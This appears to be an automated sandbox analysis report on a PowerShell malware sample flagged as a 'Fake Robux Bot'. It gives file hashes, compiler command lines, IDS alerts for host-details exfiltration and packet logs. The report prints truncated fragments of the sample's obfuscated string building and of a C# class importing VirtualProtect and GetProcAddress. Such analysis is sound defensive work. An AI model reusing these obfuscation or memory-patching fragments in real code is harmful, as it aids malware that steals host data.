                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.1077875425013333
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHqak7YnqqqbPN5Dlq5J:+RI+ycuZhN8akSIPNnqX
                                                                                  MD5:02B6EC83D076115BCF17D30BFA17F9BD
                                                                                  SHA1:43C07E59B7615BEB6B9F61626558816D3F01C620
                                                                                  SHA-256:C2D325F642CA92E4254ED38C8A94DDB1126832B1B7F786B9BFDEBBCCEF979BC6
                                                                                  SHA-512:D14587521C3132594868F5A1F243F9E474C01FD6A35581C7ACF4A0C314D15039145F06FF40B7397EF07DDC83F94F1A47B8FCC39F2C52D5CA4788C6EEB77A2133
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                                  C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):377
                                                                                  Entropy (8bit):5.242072843949939
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23frozxs7+AEszIcNwi23frl:p37Lvkmb6KwZjoWZEJZjl
                                                                                  MD5:BD03AFD5784D5818D82797026EFFD511
                                                                                  SHA1:E03B484FDD32E02126494F1078D66CEC6999577A
                                                                                  SHA-256:9FF42EDB35F86681493D21AF524B2FCD0C87596EE23C7E3BF708A2BA5D5EDE1B
                                                                                  SHA-512:CB570806EDA497E87450DCE5EE794D2682ECBFCD0A13CDA281A17E8C7A36CCDE51116A01D72478F9B8DEF2D30230EF8FC8A1E76CE61BDD3222C9BB991E648B78
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.9829599233523396
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6fpLNvhfeRPBFLMKhSJeCXumwRvV1ul8a3wq:8JhfeR5dj1G6K
                                                                                  MD5:BF544971CDB90053D2744E018A2E81A8
                                                                                  SHA1:CABF0857B235B5F5DC15F50D67E7F8B20529EEDA
                                                                                  SHA-256:2154A02EA85C54820A21DA3AAC60FB87698A1C33F02304E3C440F6562F44D942
                                                                                  SHA-512:814E6D69A1F85A4C05658D38D3BF3A04198BF909C4C78D8B1549469727EF313E261A3C885FC5EC5F7E9588F479218EFFCD0FBDEAB5470171364266C9B83CFC0A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                                  C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (460), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):881
                                                                                  Entropy (8bit):5.317295747148393
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:KwId3ka6Kg1Ev0Kax5DqBVKVrdFAMBJTH:xkka671Ev0K2DcVKdBJj
                                                                                  MD5:C4D6D3B69F432F7A245B38DFFD846212
                                                                                  SHA1:B47B41DFD5403CC98CA9E569E332061A792F194D
                                                                                  SHA-256:82046153157302B9470F8E1AD16C9507EF1E1EAF131CC7E2BBD2CCF1A58C62E3
                                                                                  SHA-512:2770FF41A7F93AFC3794690438570466B453EE6780878A6053BD16AF77F36F8F648762215E854BD0F4082B8406FE0778382A2EA665DB71F47D6BE1EE87FF0DFF
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7418218180837264
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3RNeECorlkvhkvCCtO1UY00vH11UY00nHu:3RNeMtOSYvSYg
                                                                                  MD5:9F83BFC212A48F0FFBFD2775DD62A0D5
                                                                                  SHA1:0A399389B260E15F9BB692C432B9A1A3DE093189
                                                                                  SHA-256:923A2CE40F365DA0C63CABD751BDFE054635C513052D0AEB61002895E0059B7E
                                                                                  SHA-512:6144EF72BBE9522AC7F0289833CCC0309409A7F77F8EC1E2D6B966790050CDBC24CE0E9F87B862EFD4FB8E8C43263806518733B7E36A19639157FB0F9F5BB605
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_......j....z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....".f.......j........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=OY............................3*N.A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EW.=OY................................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=OY................................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=OY............................l.9.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=OY......................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=OY......................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=OY......9...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NOJBTVPBAQ0HFWHLXA5J.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7418218180837264
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3RNeECorlkvhkvCCtO1UY00vH11UY00nHu:3RNeMtOSYvSYg
                                                                                  MD5:9F83BFC212A48F0FFBFD2775DD62A0D5
                                                                                  SHA1:0A399389B260E15F9BB692C432B9A1A3DE093189
                                                                                  SHA-256:923A2CE40F365DA0C63CABD751BDFE054635C513052D0AEB61002895E0059B7E
                                                                                  SHA-512:6144EF72BBE9522AC7F0289833CCC0309409A7F77F8EC1E2D6B966790050CDBC24CE0E9F87B862EFD4FB8E8C43263806518733B7E36A19639157FB0F9F5BB605
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_......j....z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....".f.......j........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=OY............................3*N.A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EW.=OY................................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=OY................................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=OY............................l.9.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=OY......................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=OY......................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=OY......9...........

                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (17986)
                                                                                  Entropy (8bit):3.907629029493936
                                                                                  TrID:
                                                                                    File name:cr_asm3.ps1
                                                                                    File size:27'651 bytes
                                                                                    MD5:b1e2bf28f0bb077edc92a81173ccbbfa
                                                                                    SHA1:425c6a7ae95888820b4411730475fa9b19cdb6f3
                                                                                    SHA256:682551bed0e0e7aaba3274d84d5fc80a04b926ac1e4a78e5e312eb2ffd7a5012
                                                                                    SHA512:a042101eb839273832e6347517ed51c94ed6b2e512276de5036c0ccd49c2552a01aa758e638a5da5bbe3add11c7a54f4d9afd2e614aef5a9f5f7d1f10d38b600
                                                                                    SSDEEP:192:ZaevAOBMDy2fNXj5GA+uOgMsM1wpFshbwqUdMVii2H:RvtODy2fNXj5GA+tlFb3UaUH
                                                                                    TLSH:A5C2A9F6B318509FBAC7AF9CC3455192D26DD17123E0594BFBAD880EEACAC53502076E
                                                                                    File Content Preview:$P1 = 'S'; $P2 = 'y'; $P3 = 's'; $P4 = 't'; $P5 = 'e'; $P6 = 'm'.$Sys = $P1 + $P2 + $P3 + $P4 + $P5 + $P6..$M1 = 'M'; $M2 = 'a'; $M3 = 'n'; $M4 = 'a'; $M5 = 'g'; $M6 = 'e'; $M7 = 'm'; $M8 = 'e'; $M9 = 'n'; $M10 = 't'.$Mgmt = $M1 + $M2 + $M3 + $M4 + $M5 +

                                                                                    File Icon

                                                                                    Icon Hash:3270d6baae77db44

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-15T18:08:12.766333+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749703185.199.109.133443TCP
                                                                                    2024-10-15T18:08:27.991660+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.749775162.159.138.232443TCP
                                                                                    2024-10-15T18:08:42.150593+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.749852162.159.138.232443TCP
                                                                                    2024-10-15T18:08:49.372385+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.749889162.159.138.232443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 15, 2024 18:08:10.576301098 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.576349020 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:10.576425076 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.587518930 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.587554932 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.211010933 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.211098909 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.216873884 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.216892958 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.217212915 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.231057882 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.271409035 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458034039 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458276987 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458304882 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458338976 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.458359957 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458533049 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.458813906 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469552040 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469629049 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.469640017 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469679117 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469722986 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.469728947 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.512402058 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.579438925 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.579499960 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.579556942 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.579586983 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580100060 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580130100 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580142975 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.580153942 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580197096 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.580203056 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591339111 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591408014 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.591415882 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591778994 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591829062 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.591836929 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.637386084 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705018044 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705106020 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705132008 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705152035 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705167055 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705213070 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705219030 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705234051 CEST44349701185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705277920 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.759860992 CEST49701443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.775923014 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.775975943 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.776043892 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.776375055 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.776386023 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.473546982 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.475048065 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.475066900 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766329050 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766652107 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766679049 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766702890 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766707897 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.766722918 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766747952 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.769102097 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.769155025 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.769169092 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.772355080 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.772416115 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.772427082 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.824879885 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.894630909 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894821882 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894893885 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.894906998 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894984007 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895032883 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.895037889 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895275116 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895350933 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.895356894 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.897670984 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.897763968 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.897774935 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.947552919 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.947791100 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.947808981 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.996757984 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025072098 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025470972 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025527954 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025542974 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025815010 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025860071 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025867939 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.074882984 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.085314035 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.085397005 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.085447073 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.085465908 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086117029 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086155891 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086158991 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.086169004 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086205006 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.157718897 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.157923937 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158005953 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.158024073 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158402920 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158449888 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.158461094 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.161937952 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.161988020 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.162003994 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212671995 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212713957 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212776899 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.212795973 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212836027 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.213002920 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.213151932 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.213203907 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.280268908 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:24.753350973 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.759293079 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:24.759372950 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.761657953 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.767484903 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.440244913 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.445009947 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.445060015 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.445122957 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.450093031 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.450118065 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.567027092 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.103831053 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.103907108 CEST49764443192.168.2.7104.20.3.235
